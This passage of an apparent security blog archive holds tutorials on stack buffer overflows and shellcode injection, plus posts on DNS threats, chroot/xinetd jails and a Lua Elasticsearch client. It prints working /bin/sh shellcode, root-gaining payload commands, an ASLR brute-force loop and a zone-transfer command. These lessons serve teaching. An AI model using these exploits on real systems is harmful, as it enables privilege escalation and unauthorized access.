Confirm by listing the file, ls -l vuln

-r-sr-x--- 1 root test 7392 Dec 22 00:27 vuln

What is ASLR?

From Wikipedia:

Address space layout randomization (ASLR) is a computer security technique involved in protection from buffer overflow attacks. ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap, and libraries.

In short, when ASLR is turned on, the addresses of the stack, etc will be randomized. This causes a lot of difficulty in predicting addresses while exploitation.

To disable ASLR:

echo "0" | [sudo] dd of=/proc/sys/kernel/randomize_va_space

To enable ASLR:

echo "2" | [sudo] dd of=/proc/sys/kernel/randomize_va_space

Shellcode Injection

In the first part, we’ll turn off ASLR and then approach this problem. After disabling ASLR, log into test user. You can switch user on terminal using:

su test

Clearly there is a vulnerability in vuln.c. The strcpy function does not specify a maximum length while copying. Let’s disassemble using objdump and see what we can find.

objdump -d -M intel vuln

This is how the it looks like.(It may not be the same in your case).

It can be observed that buf lies at ebp - 0x6c. 0x6c is 108 in decimal. Hence, 108 bytes are allocated for buf in the stack, the next 4 bytes would be the saved ebp pointer of the previous stack frame, and the next 4 bytes will be the return address.

Shellcode injection consists of the following main parts:

The shellcode that is to be injected is crafted.
A possible place is found where we can insert the shellcode.
The program is exploited to transfer execution flow to the location where the shellcode was inserted.

We’ll deal with each of the steps briefly:

Crafting Shellcode

Crafting shellcode is in itself a big topic to cover here. I shall take it in brief. We will create a shellcode that spawns a shell. First create shellcode.nasm with the following code:

xor     eax, eax    ;Clearing eax register
push    eax         ;Pushing NULL bytes
push    0x68732f2f  ;Pushing //sh
push    0x6e69622f  ;Pushing /bin
mov     ebx, esp    ;ebx now has address of /bin//sh
push    eax         ;Pushing NULL byte
mov     edx, esp    ;edx now has address of NULL byte
push    ebx         ;Pushing address of /bin//sh
mov     ecx, esp    ;ecx now has address of address
                    ;of /bin//sh byte
mov     al, 11      ;syscall number of execve is 11
int     0x80        ;Make the system call

Here is the link to the above mentioned code.

To compile it use nasm:

nasm -f elf shellcode.asm

Use objdump to get the shellcode bytes:

objdump -d -M intel shellcode.o

Extracting the bytes gives us the shellcode:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

Finding a possible place to inject shellcode

In this example buf seems to be the perfect place. We can insert the shellcode by passing it inside the first parameter while running vuln. But how do we know what address buf will be loaded in stack? That’s where gdb will help us. As ASLR is disabled we are sure that no matter how many times the binary is run, the address of buf will not change.

From the official website of GDB

GDB, the GNU Project debugger, allows you to see what is going on `inside’ another program while it executes – or what another program was doing at the moment it crashed.

Basically, with gdb you can run a process, stop it at any given point, examine the memory/etc. It is good to get acquainted with it, however, I shall be using a subset of its features.

So let’s run vuln using gdb:

vampire@linux:/home/test$ gdb -q vuln
Reading symbols from vuln...(no debugging symbols found)...done.
(gdb) break func
Breakpoint 1 at 0x8048456
(gdb) run $(python -c 'print "A"*116')
Starting program: /home/test/vuln $(python -c 'print "A"*116')

Breakpoint 1, 0x08048456 in func ()
(gdb) print $ebp
$1 = (void *) 0xffffce78
(gdb) print $ebp - 0x6c
$2 = (void *) 0xffffce0c

I set a breakpoint at the func function. I then started the binary with a payload of length 116 as the argument. Printing the address ebp - 0x6c shows that buf was located at 0xffffce0c. However this need not be the address of buf when we run the program outside of gdb. This is because things like environment variables and the name of the program along with arguments are also pushed on the stack. Although, the stack starts at the same address(because of ASLR disabled), the difference in the method of running the program will result in the difference of the address of buf. This difference will be around a few bytes and I will later demonstrate how to take care of it.

Note: The length of the payload will have an effect on the location of buf as the payload itself is also pushed on the stack(it is part of the arguments). I used one of length 116, which will be the length of the final payload that we’ll be passing. In case, you change the length of your payload dramatically, always remember to find the address again.

Transfering execution flow of the program to the inserted shellcode

This is the easiest part. We have the shellcode in memory and know its address(with an error of a few bytes). We have already found out that vuln is vulnerable to buffer overflow and we can modify the return address for function func.

Crafting payload

Let’s insert the shellcode at the end of the argument string so its address is equal to the address of buf + some length. Here’s our shellcode:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

Length of shellcode = 25 bytes
It is also known that return address starts after the first 112 bytes of buf
We’ll fill the first 40 bytes with NOP instructions

NOP Sled

NOP Sled is a sequence of NOP (no-operation) instructions meant to “slide” the CPU’s instruction execution flow to its final, desired, destination whenever the program branches to a memory address anywhere on the sled. Basically, whenever the CPU sees a NOP instruction, it slides down to the next instruction.

The reason for inserting a NOP sled before the shellcode is that now we can transfer execution flow to anyplace within these 40 bytes. The processor will keep on executing the NOP instructions until it finds the shellcode. We need not know the exact address of the shellcode. This takes care of the earlier mentioned problem of not knowing the address of buf exactly.

We will make the processor jump to the address of buf(taken from gdb’s output) + 20 bytes to get somewhere in the middle of the NOP sled.

0xffffce0c + 20 = 0xffffce20

We can fill the rest 47(112 - 25 - 40) bytes with random data, say the ‘A’ character.

Final payload structure:

[40 bytes of NOP - sled] [25 bytes of shellcode] [47 times ‘A’ will occupy 49 bytes] [4 bytes pointing in the middle of the NOP - sled: 0xffffce16]

So let’s try to execute it:

test@linux ~ $ ./vuln $(python -c 'print "\x90"*40 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*47 + "\x20\xce\xff\xff"')
Welcome ����������������������������������������j
                            X�Rhn/shh//bi��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4���
# whoami
root

Congratulations! We’ve got root access.

Note: In case you segmentation fault, try changing the return address by +- 40 a few times.

To summarize, we overflowed the buffer and modified the return address to point near the start of the buffer in the stack. The buffer itself started with a NOP sled followed by shellcode which got executed. Keep in mind that we did all this with ASLR turned off. Which means that the start of the stack wasn’t randomized each time the program was executed. This enabled us to first run the program in gdb to know the address of buffer. Make sure you’ve understood everything till here. Now we shall be going to the exciting part!

Shellcode Injection with ASLR

You can turn ASLR on and try to execute our earlier exploit. A great chance you wouldn’t be able to run it. So how do we approach now? To begin, let’s first try to inspect a few things. Let’s create a program to just print the address of its variable which is stored on the stack.

#include <stdio.h>

int main()
{
    int a;
    printf("%p\n", &a);
    return 0;
}

Here is the link to the above mentioned code.

Compile it to a 32 bit binary as before. This is my output for a few test runs:

test@linux ~ $ ./stack_addr 
0xffe918bc
test@linux ~ $ ./stack_addr 
0xffdc367c
test@linux ~ $ ./stack_addr 
0xffeaf37c
test@linux ~ $ ./stack_addr 
0xffc31ddc
test@linux ~ $ ./stack_addr 
0xffc6a56c
test@linux ~ $ ./stack_addr 
0xffbcf9bc
test@linux ~ $ ./stack_addr 
0xffbcf02c
test@linux ~ $ ./stack_addr 
0xffbf1dcc
test@linux ~ $ ./stack_addr 
0xfffe386c
test@linux ~ $ ./stack_addr 
0xff9547cc

It seems that every time the variable is loaded at different addresses in the stack. The address can be represented as 0xffXXXXXc(where X is any hexadecimal digit). With some more testing, it can be seen that even the last half-byte(‘c’ over here) depends on the relative location of the variable inside the program. So in general, the address of a variable on the stack is 0xffXXXXXX. This amounts to 16^6 = 16777216 possible cases. It can be easily seen that the earlier method, mentioned above to exploit the stack, will now work with only 40/16777216 probability(40 is the length of NOP - sled, if any of those NOP bytes happen to be where the modified return address points, the shellcode will be executed). That means on an average, 1 in every 419431 runs, the shellcode will be executed.

Now that is quite depressing. The key point to note here is that the probability depended on the length of the NOP sled. Clearly by increasing its length we can execute our shellcode with greater probability. However, the length of the buffer is limited. We can’t get much increase in probability even by using the full buffer. Looks as if we need to find some other place to inject our nop sled + shellcode(i.e. modifying the second step in the three steps listed above).

It turns out that we have another candidate - environment variable!

We could insert the nop sled + shellcode in an environment variable. Keep in mind that all the environment variables themselves are loaded on the stack. Moreover, the size limit of environment variables is huge. It turns out that on my machine I can create a NOP sled of 100,000!

So lets create an environment variable SHELLCODE:

export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')

Now let’s choose any random address somewhere in the middle, say 0xff881111. Now run vuln program overriding the return address with this. To increase our chances of hittinh lets do this repeatedly using a for loop.

test@linux ~ $ for i in {1..100}; do ./vuln $(python -c 'print "A"*112 + "\x11\x11\x88\xff"'); done

After a few runs, we get shell access!

Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
# whoami
root
#

Sweet, isn’t it?

Even if your machine does not support as big a NOP sled as I used, use binary search to choose the maximum allowed. I’ve listed the probabilities of various sizes:

Size of NOP Sled	Probability of shellcode execution	Average no of tries needed to succeed once
40	2.38418579102e-06	419431
100	5.96046447754e-06	167773
500	2.98023223877e-05	33555
1000	5.96046447754e-05	16778
10000	5.96046447754e-04	1678
100000	5.96046447754e-03	168

In this blog I’ve used the return address(on the stack) to control the execution flow of the program. There are many other possible places for attacking.

Note: I did a talk and a demo about Shellcode Injection in my college as part of ‘Recent trends in Network Security’. Slides can be found here.

Elasticsearch Lua

2015-10-07T00:00:00+00:00

This post is about elasticsearch-lua. I developed it during the summer of 2015 as part of GSoC(Google Summer of Code) 2015. Here I shall describe the reasons for various software design decisions that I took.

Note: This post is not about ‘How to use elasticsearch-lua’. I would recommend you to go through the README and the documentation on how to use elasticsearch-lua.

Introduction

Elasticsearch is a very powerful and scalable search engine. It provides a REST API accessed through JSON format. There are many clients written in different languages (e.g. php, js, python, ruby) that wrap around the REST API to provide an abstraction. However, there was no client for Lua. My project aimed to create an elasticsearch client for Lua developers.

As part of GSOC-2015 I worked with the LabLua “organization”, a research laboratory at PUC-Rio dedicated to research about programming languages, especially Lua, and my mentor Pablo Musa.

Motivation

I develop applications under the student group SDSLabs. One of our applications had a text-search feature on a large dataset. Using Elasticsearch in the backend, greatly enhanced its performance. Seeing its potential, I was greatly interested in it.

Later when I read about the elasticsearch-lua project under GSoC I was quite excited. I was getting the opportunity to develop a client for elasticsearch in Lua. Clearly it had a lot of uses for the developers using the Lua language. My interest in software networking also motivated me to work on this project.

Developing elasticsearch-lua

Influenced by other official clients

Much of the client was influenced by the official clients, mainly elasticsearch-php, elasticsearch-js, and elasticsearch-py. Before even starting with the design of the client I went through the architecture of these clients to get acquainted with the feature set they provide and the conventions they follow. My reason for doing so was to basically prevent ‘reinventing the wheel’ while stable and widely used clients were already present. Also providing the same kind of conventions would help any user, who has already used these other clients, to feel at home while working with the client. This is evident from the below example in which both codes look quite similar. The same applies to most functions as well.

Using the Javascript client to get a document

  var elasticsearch = require('elasticsearch');

  var client = new elasticsearch.Client({
    host: 'localhost:9200',
    log: 'trace'
  });

  client.get({
    index: 'my_index',
    type: 'my_type',
    id: 'my_dox'
  }, function (error, response) {
    // ...
  });

Using the Lua client to get a document

  local elasticsearch = require "elasticsearch"

  local client = elasticsearch.client{
    hosts = {
      { host = "localhost",
        port = 9200
      }
    }
  }

  local data, err = client:get{
    index = "my_index",
    type = "my_type",
    id = "my_doc"
  }

Using Object Oriented Programming

Although Lua does not provide any special construct for declaring objects and classes, I preferred going with object oriented approach mostly because I was used to it. Lua has only the concept of tables. To create an object model over the Lua table, I followed the approach suggested by the language author.

Logging

I looked into log4j while including logging in the client. Log levels defined in the client are same as compared with log levels in log4j. The user can specify the log levels while creating the client object.

Lua specific constructs

Instead of throwing errors using error() function, I kept on with the Lua convention of returning nil, error. This enables the user to systematically handle errors as and when required. Also, there is a conceptual difference between ‘Application Error’ and ‘Request Error’.

Lua has the concept of passing parameters by reference. Hence, sometimes I maintained a copy of variables to work on instead of directly changing the passed parameters.

Parameter checking while requesting endpoints

Every request to an endpoint in elasticsearch is associated with various parameters that are passed in the HTTP request. Every kind of endpoint has a list of allowed parameters. I discussed with my mentor regarding the possibility of checking user parameters before sending a request. In the end I decided to to implement parameter checking because of the following reasons:

The user should focus more on his application rather than elasticsearch.
The user should be notified of invalid parameters as it saves time in debugging his/her own code.
Not much overhead is required to check the parameters passed by the user.
Sending invalid requests will only put unnecessary load on the server and be time-consuming for the client.

Overall it’s been a wonderful experience developing elasticsearch-lua and working for Google Summer of Code. It was a great learning for me. I shall continue developing it further. Feel free to contribute!

DNS Security

2015-09-08T00:00:00+00:00

Introduction

The Domain Name System is an essential component of the functionality of most Internet services. It provides a distributed solution for services such as resolving host names to IP addresses and vice versa. DNS was designed around the early 1980s without any security consideration. This was mainly because at that time networks were quite small. All the hosts in the network were known beforehand and trustworthy. There was no need for authenticity.

But as the network grew and Internet was born DNS remained unchanged. This resulted in lots of threats that target DNS due to the lack of authenticity and integrity checking of data held within the DNS. In 1994, the Internet Engineering Task Force (IETF) started working to add security extensions known as Domain Name System Security Extensions (DNSSEC) to the existing DNS protocol. Unfortunately, these extensions are still far from being adopted.

A discussion on each of these topics is presented in this blog.

About DNS

As per wikipedia

The Domain Name System (DNS) is a hierarchical distributed naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities. Most prominently, it translates domain names, which can be easily memorized by humans, to the numerical IP addresses needed for the purpose of computer services and devices worldwide.

Image Source: here

DNS is like a phone book for the Internet. One can’t remember each and every IP for the websites that he or she visits. It’s much easier to remember the domain names instead.

Threats involving DNS

Zone File Compromise
Zone Information Leakage/DNS Footprinting
DNS Amplification Attack
DNS Client flooding
DNS Cache poisoning
DNS Vulnerabilities in Shared Host Environments
DNS Man in the Middle Attacks - DNS Hijacking
Typosquatting

Zone File Compromise

The DNS server is hosted on a number of machines. The administrator can configure the DNS server including the DNS records using either command line interface or a GUI interface provided by the DNS server.

In a Zone File Compromise attack, the attacker attacks the DNS server by gaining direct access to these machines. He/she can be in physical contact with the server or connected through an SSH/RDP connection.

Security measures: Restrict access to the DNS server, both physically and remotely.

Zone Information Leakage/DNS Footprinting

DNS Zone Transfer involves a DNS server passing a copy of part of its database(called “zone”) to another DNS server. Zone transfer is used when we need to have more than one DNS server answering queries for a particular zone. There is a Master DNS Server and some Slave DNS Servers. A Slave DNS Server asks for zone transfer from the Master DNS Server.

The attacker just pretends to be a Slave DNS Server and asks the Master DNS Server for a copy of the records. These records reveal a lot about the topology of the internal network. Steps for performing Zone Transfer(on a UNIX machine):

  dig NS 'domain' +short

Displays the authoritative name servers for that domain

  dig AXFR 'domain' @'nameserver'

Retrieves all the DNS records from a particular nameserver

Security measures: Restrict zone transfers to particular IP addresses or use any other kind of authentication.

DNS Amplification Attack

This type of attack is used to perform DOS attack on a victim host using genuine DNS servers. It involves sending DNS packets to a DNS server, spoofed with source IP as the victim IP. The DNS server responds back with much larger DNS responses that go to the victim host.

DNS Client Flooding

DNS Client Flooding aims at sending a flood of UDP requests to the DNS server to exhaust its resources. A common technique is to send DNS request packets for an invalid domain. The DNS server spends its resources to look for this domain. After a certain limit, it has no resources to serve legitimate requests.

DNS Cache poisoning

A client queries its configured DNS server for resolving a domain name. This DNS server queries other DNS servers for that domain name and after getting a result, caches it, till the corresponding TTL value. Until this TTL value, client queries for that particular domain name are retrieved from the cache instead of making further queries to other DNS servers for that domain.

This can be abused by an attacker to place false information in the local DNS server’s cache. The attacker needs to reply back to the configured DNS server with the malicious address before the actual reply comes back.

Image Source: here

DNS Vulnerabilities in Shared Host Environments

A shared host environment is where one DNS server is shared amongst many users and domains.

Free Services such as cpanel provide such facilities.

Say an attacker using a shared DNS server creates a zone file for xyz.com domain and adds relevant A and MX records. Now any user who has the said DNS server configured as primary from a client will when attempting to go to xyz.com be directed to the records as configured by the client i.e. potentially false information.

Image Source: here

DNS Man in the Middle Attacks - DNS Hijacking

An attacker can intercept the name resolution queries sent by the client to a DNS server. He/she can send back incorrect replies back to the client. This type of attack is very much a race condition, in that the attacker needs to get his reply back to the client before the legitimate server does. The client shall only look at the first response it gets and there is no way it can differentiate between the attacker or its DNS server.

Image Source: here

Typosquatting

Definition from wikipedia:

Typosquatting, also called URL hijacking, sting site, or fake URL, is a form of cybersquatting, and possibly brandjacking which relies on mistakes such as typographical errors made by Internet users when inputting a website address into a web browser. Should a user accidentally enter an incorrect website address, they may be led to any URL (including an alternative website owned by a cybersquatter).

The attacker registers similar sounding domain names. This threat does not target a particular victim.

DNSSEC (Domain Name System Security Extensions)

Around 1994, the IETF started a discussion to make DNS secure by adding a set of extensions to it. These extensions, labeled as Domain Name System Security Extensions (DNSSEC), were formally published in 2005. Unfortunately, even after around 10 years, DNSSEC is still not adopted even though its backward compatible. Mostly because network operatives prefer stability over complexity.

Backward compatibility was enforced by using the RR (Resource Record) construct of the DNS that was purposely designed to be extensible. A new set of RRs was defined that holds the security information. While designing DNSSEC, performance issues were kept in mind.

In all DNSSEC provides authentication and integrity to the DNS. This helps in preventing many attacks. Cache poisoning and Client flooding attacks are prevented with the addition of source authentication. Even Zone File Compromise attack is mitigated. Note however that DNSSEC does not provide any security against information leakage.

Note: I recently did a talk about DNS Security in my college. Slides can be found here.

Edit: Lately there has been work on minimizing information leakage. This is a good resource. Thanks to captnemo for pointing this out.

Combining chroot and xinetd

2015-05-04T00:00:00+00:00

Introduction

In this blog we will talk about running network applications securely. A simple program(that takes I/O from the console) can be run as a secure service using a combination of xinetd and chroot. I used this technique while developing challenges for Backdoor. The ECHO challenge is a good example.

Key points:

The program running in the background takes I/O directly from the console.
xinetd handles all the network related requests.
The program is run in a jail directory using chroot with restricted access to directory structure.

I will give a simple walkthrough but first I expect the reader to be familiar with the following:

xinetd

This is what wikipedia says:

  xinetd listens for incoming requests over a network and launches the appropriate service for that request. Requests are made using port numbers as identifiers and xinetd usually launches another daemon to handle the request.

Instead of starting each server individually, xinetd is the only daemon process to be started. It listens for each and every service listed in its configuration and starts the appropriate service whenever a new request comes up.

chroot

Again from wikipedia:

  A chroot on Unix operating systems is an operation that changes the apparent root directory for the current running process and its children. A program that is run in such a modified environment cannot name (and therefore normally not access) files outside the designated directory tree. The modified environment is called a "chroot jail".

Setting up a chroot jail is easy though time consuming.

Walkthrough - reader

We’ll write a simple service to that takes the name of a file as the input and prints the first 1024 bytes of the file.

1. Write source program for the service

  #include <stdio.h>
  #include <unistd.h>
  #include <fcntl.h>
  #include <errno.h>

  int main()
  { char file_name[50];
    char buf[1025];
    int fd;
    
    printf("Enter filename:\n");
    fflush(stdout);
    scanf("%s", file_name);
    
    fd = open(file_name, O_RDONLY);
    if(fd==-1)
    { printf("Error: %d\n", errno);
      return -1;
    }
    if(read(fd, buf, sizeof(buf))<0)
    { printf("Error: %d\n", errno);
      close(fd);
      return -1;
    }

    printf("%s\n", buf);
    close(fd);
    return 0;
  }

Download it here

2. Creating a chroot jail

First of all let’s compile our code and generate the binary.

gcc reader.c -o reader

As it will be jailed, we need to import all the libraries that our binary reader will require. For finding all the required libraries we will use ldd.

  $ ldd reader
  linux-vdso.so.1 =>  (0x00007ffc79702000)
  libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f4b13787000)
  /lib64/ld-linux-x86-64.so.2 (0x00007f4b13b76000)

This is a sample output on my machine and it may vary for yours. So basically I copy the two libraries (libc.so.6 and ld-linux-x86-64.so.2) maintaining the same directory structure relative to my program. My directory structure now looks like this:

  ./
  |-- lib/
  |-- |-- x86_64-linux-gnu/
  |-- --- |-- libc.so.6
  |-- lib64/
  |-- |-- ld-linux-x86-64.so.2
  |-- reader.c
  |-- reader

To test that you have successfully created a jail try this:

chroot . ./reader

You won’t be able to view any file outside the reader’s directory. If you can then you did something wrong!

3. Adding a configuration file in xinetd for reader

First of all make sure that /etc/xinetd.conf contains the following line:

includedir /etc/xinetd.d

After that create a new configuration file /etc/xinetd.d/reader

  service reader
  {
    type    = UNLISTED
    protocol  = tcp
    socket_type = stream
    port    = 8001
    wait    = no

    server    = /usr/sbin/chroot
    server_args = /home/vampire/reader/ ./reader
    
    user    = root
  }

You can download the file here.

Explanation:

type = UNLISTED: Standard services are listed in /etc/services. Our service is not standard so we will also need to specify the protocol and port.
protocol = tcp: We shall use tcp protocol.
socket_type = stream: We will use connection oriented socket
port = 8001: The port number our service will listen to
wait = no: Our service is multithreaded. There can be more than one client connected to it at a time.
server = /usr/sbin/chroot: This is the chroot binary in my machine. You can find yours by executing which chroot.
server_args = /home/vampire/reader/ ./reader: These are the parameters passed to chroot command.
user = root: Only root users can run chroot.

For complete list see the man page.

4. Restart the xinetd daemon

The xinetd daemon can be restarted using the following command:

/etc/init.d/xinetd restart

xinetd logs in /var/log/syslog by default.

Hurray! We have successfully run our service securely. To test it run the following command:

nc localhost 8001

Change the IP/port accordingly. You should be able to run the program correctly. Also try giving different source file path names. You won’t be able to access any file other than one in /home/vampire/reader/. Also keep in mind to flush the buffer so that the text is displayed instantly.

Comments are welcome. If you know of a better way to do this, feel free to tell me!

Buffer Overflow Exploit

2015-04-03T00:00:00+00:00

Introduction

I am interested in exploiting binary files. The first time I came across the buffer overflow exploit, I couldn’t actually implement it. Many of the existing sources on the web were outdated(worked with earlier versions of gcc, linux, etc). It took me quite a while to actually run a vulnerable program on my machine and exploit it.

I decided to write a simple tutorial for beginners or people who have just entered the field of binary exploits.

What will this tutorial cover?

This tutorial will be very basic. We will simply exploit the buffer by smashing the stack and modifying the return address of the function. This will be used to call some other function. You can also use the same technique to point the return address to some custom code that you have written, thereby executing anything you want(perhaps I will write another blog post regarding shellcode injection).

Any prerequisites?

I assume people to have basic-intermediate knowledge of C.
They should be a little familiar with gcc and the linux command line.
Basic x86 assembly language.

Machine Requirements:

This tutorial is specifically written to work on the latest distro’s of linux. It might work on older versions. Similar is the case for gcc. We are going to create a 32 bit binary, so it will work on both 32 and 64 bit systems.

Sample vulnerable program:

#include <stdio.h>

void secretFunction()
{
    printf("Congratulations!\n");
    printf("You have entered in the secret function!\n");
}

void echo()
{
    char buffer[20];

    printf("Enter some text:\n");
    scanf("%s", buffer);
    printf("You entered: %s\n", buffer);    
}

int main()
{
    echo();

    return 0;
}

Now this programs looks quite safe for the usual programmer. But in fact we can call the secretFunction by just modifying the input. There are better ways to do this if the binary is local. We can use gdb to modify the %eip. But in case the binary is running as a service on some other machine, we can make it call other functions or even custom code by just modifying the input.

Memory Layout of a C program

Let’s start by first examining the memory layout of a C program, especially the stack, it’s contents and it’s working during function calls and returns. We will also go into the machine registers esp, ebp, etc.

Divisions of memory for a running process

Source: http://i.stack.imgur.com/1Yz9K.gif

Command line arguments and environment variables: The arguments passed to a program before running and the environment variables are stored in this section.
Stack: This is the place where all the function parameters, return addresses and the local variables of the function are stored. It’s a LIFO structure. It grows downward in memory(from higher address space to lower address space) as new function calls are made. We will examine the stack in more detail later.
Heap: All the dynamically allocated memory resides here. Whenever we use malloc to get memory dynamically, it is allocated from the heap. The heap grows upwards in memory(from lower to higher memory addresses) as more and more memory is required.
Uninitialized data(Bss Segment): All the uninitialized data is stored here. This consists of all global and static variables which are not initialized by the programmer. The kernel initializes them to arithmetic 0 by default.
Initialized data(Data Segment): All the initialized data is stored here. This constists of all global and static variables which are initialised by the programmer.
Text: This is the section where the executable code is stored. The loader loads instructions from here and executes them. It is often read only.

Some common registers:

%eip: The Instruction pointer register. It stores the address of the next instruction to be executed. After every instruction execution it’s value is incremented depending upon the size of an instrution.
%esp: The Stack pointer register. It stores the address of the top of the stack. This is the address of the last element on the stack. The stack grows downward in memory(from higher address values to lower address values). So the %esp points to the value in stack at the lowest memory address.
%ebp: The Base pointer register. The %ebp register usually set to %esp at the start of the function. This is done to keep tab of function parameters and local variables. Local variables are accessed by subtracting offsets from %ebp and function parameters are accessed by adding offsets to it as you shall see in the next section.

Memory management during function calls

Consider the following piece of code:

void func(int a, int b)
{
    int c;
    int d;
    // some code
}
void main()
{
    func(1, 2);
    // next instruction
}

Assume our %eip is pointing to the func call in main. The following steps would be taken:

A function call is found, push parameters on the stack from right to left(in reverse order). So 2 will be pushed first and then 1.
We need to know where to return after func is completed, so push the address of the next instruction on the stack.
Find the address of func and set %eip to that value. The control has been transferred to func().
As we are in a new function we need to update %ebp. Before updating we save it on the stack so that we can return later back to main. So %ebp is pushed on the stack.
Set %ebp to be equal to %esp. %ebp now points to current stack pointer.
Push local variables onto the stack/reserver space for them on stack. %esp will be changed in this step.
After func gets over we need to reset the previous stack frame. So set %esp back to %ebp. Then pop the earlier %ebp from stack, store it back in %ebp. So the base pointer register points back to where it pointed in main.
Pop the return address from stack and set %eip to it. The control flow comes back to main, just after the func function call.

This is how the stack would look while in func.

Buffer overflow vulnerability

Buffer overflow is a vulnerability in low level codes of C and C++. An attacker can cause the program to crash, make data corrupt, steal some private information or run his/her own code.

It basically means to access any buffer outside of it’s alloted memory space. This happens quite frequently in the case of arrays. Now as the variables are stored together in stack/heap/etc. accessing any out of bound index can cause read/write of bytes of some other variable. Normally the program would crash, but we can skillfully make some vulnerable code to do any of the above mentioned attacks. Here we shall modify the return address and try to execute the return address.

Here is the link to the above mentioned code. Let’s compile it.

For 32 bit systems

gcc vuln.c -o vuln -fno-stack-protector

For 64 bit systems

gcc vuln.c -o vuln -fno-stack-protector -m32

-fno-stack-protector disabled the stack protection. Smashing the stack is now allowed. -m32 made sure that the compiled binary is 32 bit. You may need to install some additional libraries to compile 32 bit binaries on 64 bit machines. You can download the binary generated on my machine here.

You can now run it using ./vuln.

Enter some text:
HackIt!
You entered: HackIt!

Let’s begin to exploit the binary. First of all we would like to see the disassembly of the binary. For that we’ll use objdump

objdump -d vuln

Running this we would get the entire disasembly. Let’s focus on the parts that we are interested in. (Note however that your output may vary)

Inferences:

The address of secretFunction is 0804849d in hex.
```
 0804849d <secretFunction>:
```
38 in hex or 56 in decimal bytes are reserved for the local variables of echo function.
```
 80484c0:    83 ec 38    sub         $0x38,%esp
```
The address of buffer starts 1c in hex or 28 in decimal bytes before %ebp. This means that 28 bytes are reserved for buffer even though we asked for 20 bytes.
```
 80484cf:    8d 45 e4    lea         -0x1c(%ebp),%eax
```

Designing payload:

Now we know that 28 bytes are reserved for buffer, it is right next to %ebp(the Base pointer of the main function). Hence the next 4 bytes will store that %ebp and the next 4 bytes will store the return address(the address that %eip is going to jump to after it completes the function). Now it is pretty obvious how our payload would look like. The first 28+4=32 bytes would be any random characters and the next 4 bytes will be the address of the secretFunction.

Note: Registers are 4 bytes or 32 bits as the binary is compiled for a 32 bit system.

The address of the secretFunction is 0804849d in hex. Now depending on whether our machine is little-endian or big-endian we need to decide the proper format of the address to be put. For a little-endian machine we need to put the bytes in the reverse order. i.e. 9d 84 04 08. The following scripts generate such payloads on the terminal. Use whichever language you prefer to:

ruby -e 'print "a"*32 + "\x9d\x84\x04\x08"'

python -c 'print "a"*32 + "\x9d\x84\x04\x08"'

perl -e 'print "a"x32 . "\x9d\x84\x04\x08"'

php -r 'echo str_repeat("a",32) . "\x9d\x84\x04\x08";'

Note: we print \x9d because 9d was in hex

You can pipe this payload directly into the vuln binary.

ruby -e 'print "a"*32 + "\x9d\x84\x04\x08"' | ./vuln

python -c 'print "a"*32 + "\x9d\x84\x04\x08"' | ./vuln

perl -e 'print "a"x32 . "\x9d\x84\x04\x08"' | ./vuln

php -r 'echo str_repeat("a",32) . "\x9d\x84\x04\x08";' | ./vuln

This is the output that I get:

Enter some text:
You entered: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<rubbish 3 bytes>
Congratulations!
You have entered in the secret function!
Illegal instruction (core dumped)

Cool! we were able to overflow the buffer and modify the return address. The secretFunction got called. But this did foul up the stack as the program expected secretFunction to be present.

What all C functions are vulnerable to Buffer Overflow Exploit?

gets
scanf
sprintf
strcpy

Whenever you are using buffers, be careful about their maximum length. Handle them appropriately.

What next?

While managing BackdoorCTF I devised a simple challenge based on this vulnerability. Here. See if you can solve it!

Facebook spam spreads Trojan

2014-06-12T00:00:00+00:00

Introduction

Somewhere back in May, I started getting messages such as this on facebook:

I had around 300 friends then and got almost 8-9 such messages. The interesting thing was that those people were completely unrelated. According to me some of them didn’t know each other. Suspecting some trick I decided to analyze the file.

Analysis

Handling the zip file

I downloaded the zip file and verified it’s type using linux file command. Then after unzipping the file I found a jar file inside it. Just for reference a jar file is a java archive file which can be run by simply double clicking it. It is equivalent to exe file in C/C++. Another important point to note is that a jar file is infact a zip file(only the extension has been changed). So the next step I did was to extract the jar file. Doing that produced a single class file alongwith the usual META-INF

vampire@linux:~/Documents/analysis$ file Form\_0320.ZIP
Form\_0320.ZIP: Zip archive data, at least v2.0 to extract
vampire@linux:~/Documents/analysis$ unzip Form\_0320.ZIP
Archive:  Form\_0320.ZIP
  inflating: Form\_0320.jar           
